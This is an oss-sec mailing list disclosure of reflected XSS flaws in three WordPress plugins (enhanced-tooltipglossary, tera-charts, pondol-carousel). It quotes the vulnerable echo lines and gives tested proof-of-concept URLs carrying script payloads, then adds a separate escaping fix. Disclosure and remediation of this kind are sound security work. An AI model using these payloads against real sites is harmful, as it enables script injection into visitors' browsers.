oss-sec mailing list archives

Reflected XSS in three WordPress plugins.


From: "Larry W. Cashdollar" <larry0 () me com>
Date: Wed, 11 May 2016 12:28:33 -0400

Hello List,

I've manually confirmed these vulnerabilities:

Title: Reflected XSS in WordPress plugin enhanced-tooltipglossary v3.2.8
Date: 2016-02-09
Download Site: https://wordpress.org/plugins/enhanced-tooltipglossary
Vulnerability:
There is a reflected XSS vulnerability in the following PHP code ./enhanced-tooltipglossary/backend/views/admin_importexport.php:
19:        ?> (<?php echo $_GET['itemsnumber']; ?> items read from file)</div>
The variable itemsnumber appears to send unsanitized data back to the user's browser.
DWF-2016-77246
PoC:
This is a tested exploit:
http://[target]/wp-content/plugins/enhanced-tooltipglossary/backend/views/admin_importexport.php?itemsnumber=<script>alert(1)</script>&msg=imported
Advisory: http://www.vapidlabs.com/wp/wp_advisory.php?v=37


Title: Reflected XSS in WordPress plugin tera-charts v1.0
Date: 2016-02-09
Download Site: https://wordpress.org/plugins/tera-charts (removed by WP)
Vulnerability:
There is a reflected XSS vulnerability in the following PHP code ./tera-charts/charts/treemap.php:
52:    var data_filename = "<?php echo $_GET['fn']; ?>";
55:    var chart_userid = "<?php echo $_GET['userid']; ?>";
The variable fn appears to send unsanitized data back to the user's browser.
DWF-2016-77716
PoC:
This is a tested exploit:
http://wp-site/tera-charts/charts/treemap.php?fn=";;</script><script>alert(1);</script><script>"&userid=1
Advisory: http://www.vapidlabs.com/wp/wp_advisory.php?v=455


Title: Reflected XSS in WordPress plugin pondol-carousel v1.0 (no response from author)
Date: 2016-02-09
Download Site: https://wordpress.org/plugins/pondol-carousel
Vulnerability:
There is a reflected XSS vulnerability in the following PHP code ./pondol-carousel/pages/admin_create.php:
5:      var itemid      = "<?php echo $_GET["itemid"];?>";
The variable itemid appears to send unsanitized data back to the user's browser.
DWF-2016-77531
PoC:
This is a tested exploit:
http://wp-sitehttp://192.168.0.115/pondol-carousel/pages/admin_create.php?itemid=";;</script><script>alert(1);</script>"
Advisory: http://www.vapidlabs.com/wp/wp_advisory.php?v=524


For more information on DWF assignments see https://github.com/distributedweaknessfiling/DWF-Documentation
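Added example, not code from the advisory or from the plugins: the three echo sites above rewritten so that the HTML text context and the JavaScript string context each get the escaping that context needs. It assumes the file is loaded by WordPress (so absint, esc_html, sanitize_file_name, wp_unslash and wp_json_encode exist) and, as an assumption, that itemsnumber, userid and itemid are numeric and fn is a file name.

```php
<?php
// Added example, not the plugins' own code. Assumes WordPress has loaded this
// file; a direct request to it (as in the PoC URLs) stops at the ABSPATH guard.
if ( ! defined( 'ABSPATH' ) ) {
    exit; // Direct requests never reach the echo statements below.
}

// 1. HTML text context (admin_importexport.php, line 19).
//    The original echoes $_GET['itemsnumber'] straight into the page.
//    The value is a count, so coerce it to a non-negative integer on input
//    and HTML-escape it on output (plain-PHP equivalent: htmlspecialchars()).
$items_number = isset( $_GET['itemsnumber'] ) ? absint( $_GET['itemsnumber'] ) : 0;
?>
(<?php echo esc_html( $items_number ); ?> items read from file)</div>

<?php
// 2. JavaScript string context (treemap.php lines 52 and 55,
//    admin_create.php line 5). The originals place $_GET values inside a
//    double-quoted JS string, so a value containing a quote breaks out of the
//    string, and one containing "</script>" closes the whole script block.
//    HTML escaping is the wrong tool here: emit a complete JS literal instead.
//    wp_json_encode() (json_encode() in plain PHP) supplies the quotes,
//    escapes embedded quotes and backslashes, and encodes "/" as "\/", so the
//    browser's HTML parser never sees a closing </script> inside the value.
//    Assumption: fn is a file name, userid and itemid are integer ids.
$data_filename = isset( $_GET['fn'] ) ? sanitize_file_name( wp_unslash( $_GET['fn'] ) ) : '';
$chart_userid  = isset( $_GET['userid'] ) ? absint( $_GET['userid'] ) : 0;
$item_id       = isset( $_GET['itemid'] ) ? absint( $_GET['itemid'] ) : 0;
?>
<script>
    var data_filename = <?php echo wp_json_encode( $data_filename ); ?>;
    var chart_userid  = <?php echo wp_json_encode( $chart_userid ); ?>;
    var itemid        = <?php echo wp_json_encode( $item_id ); ?>;
</script>
```

With the JSON-encoded form, the tera-charts PoC value `";;</script><script>alert(1);</script><script>"` is rendered as a single string literal (`"\";;<\/script>..."`) that the chart code receives as data rather than the browser executing it.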
